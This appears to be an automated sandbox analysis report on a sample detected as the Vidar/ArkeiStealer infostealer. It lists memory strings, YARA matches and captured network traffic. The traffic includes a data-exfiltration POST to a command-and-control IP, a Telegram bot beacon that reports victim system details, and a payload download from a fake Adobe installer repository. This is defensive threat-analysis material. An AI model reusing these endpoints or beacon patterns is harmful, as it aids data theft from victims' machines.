Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://116.202.0.187/1199;
Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://116.202.0.187/update.zip
Source: AppLaunch.exe, 0000000E.00000002.543793950.0000000004D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org/bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20worke
Source: AppLaunch.exe, 0000000E.00000002.544285112.0000000006C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apii.telegram.org/
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, mozglue.dll.2.dr, Software[2].exe.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertS
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, mozglue.dll.2.dr, Software[2].exe.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: AppLaunch.exe, 00000002.00000003.465529016.000000000535F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000E.00000002.543854413.0000000004DB2000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000E.00000003.543147299.0000000004DB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, mozglue.dll.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, mozglue.dll.2.dr, Software[2].exe.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, mozglue.dll.2.dr, Software[2].exe.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, mozglue.dll.2.dr, Software[2].exe.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, mozglue.dll.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
Source: AppLaunch.exe, 0000000E.00000002.544285112.0000000006C80000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000E.00000002.544334830.0000000006CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/json
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, mozglue.dll.2.dr, Software[2].exe.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, mozglue.dll.2.dr, Software[2].exe.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, mozglue.dll.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, mozglue.dll.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, mozglue.dll.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, mozglue.dll.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.2.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, mozglue.dll.2.dr, softokn3.dll.2.dr	String found in binary or memory: http://www.mozilla.com0
Source: temp.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AppLaunch.exe, 0000000E.00000002.543793950.0000000004D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20work
Source: temp.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MzRn1YNrbz.exe, 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, MzRn1YNrbz.exe, 00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: https://climatejustice.social/
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: temp.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: temp.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: temp.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AppLaunch.exe, 00000002.00000003.465481735.0000000005353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/n
Source: AppLaunch.exe, 0000000E.00000002.543780633.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, json[1].json.14.dr	String found in binary or memory: https://ipinfo.io/missingauth
Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/
Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.514112524.00000000053D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/479754935/9956e2fd-f4a0
Source: temp.2.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: temp.2.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: MzRn1YNrbz.exe, 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, MzRn1YNrbz.exe, 00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.465529016.000000000535F000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.465481735.0000000005353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/verstappenf1r
Source: MzRn1YNrbz.exe, 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, MzRn1YNrbz.exe, 00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/verstappenf1rhttps://climatejustice.social/
Source: AppLaunch.exe, 00000002.00000003.465481735.0000000005353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.org/img/t_logo.png
Source: AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, mozglue.dll.2.dr, Software[2].exe.2.dr, softokn3.dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: temp.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4CPROSXMVQCDF92UHost: 116.202.0.187Content-Length: 126869Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: t.me

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 14_2_004065C0 InternetReadFile,

14_2_004065C0

Source: global traffic	HTTP traffic detected: GET /verstappenf1r HTTP/1.1Host: t.me
Source: global traffic	HTTP traffic detected: GET /AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe HTTP/1.1Cache-Control: no-cacheHost: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/479754935/9956e2fd-f4a0-464d-bde7-7689139d2f54?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20220516%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220516T082952Z&X-Amz-Expires=300&X-Amz-Signature=4c7240ec515c7cb063a6716cd0ef70b36234d6f863c926f5119f7f1a2916e474&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=479754935&response-content-disposition=attachment%3B%20filename%3DSoftware.exe&response-content-type=application%2Foctet-stream HTTP/1.1Cache-Control: no-cacheConnection: Keep-AliveHost: objects.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.55%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20Program%0A HTTP/1.1Accept: text/*User-Agent: softHost: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 116.202.0.187
Source: global traffic	HTTP traffic detected: GET /1199 HTTP/1.1Host: 116.202.0.187Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update.zip HTTP/1.1Host: 116.202.0.187Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe HTTP/1.1Host: github.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Accept: text/*User-Agent: softHost: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.55%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20Program%0A HTTP/1.1Accept: text/*User-Agent: softHost: api.telegram.org

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49786 version: TLS 1.2

Source: SRT2H1V9CYLP5LNSR3MB.exe, 00000007.00000002.529216465.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.MzRn1YNrbz.exe.e629ac.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.MzRn1YNrbz.exe.e629ac.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 0.3.MzRn1YNrbz.exe.3070000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.3.MzRn1YNrbz.exe.3070000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
Source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
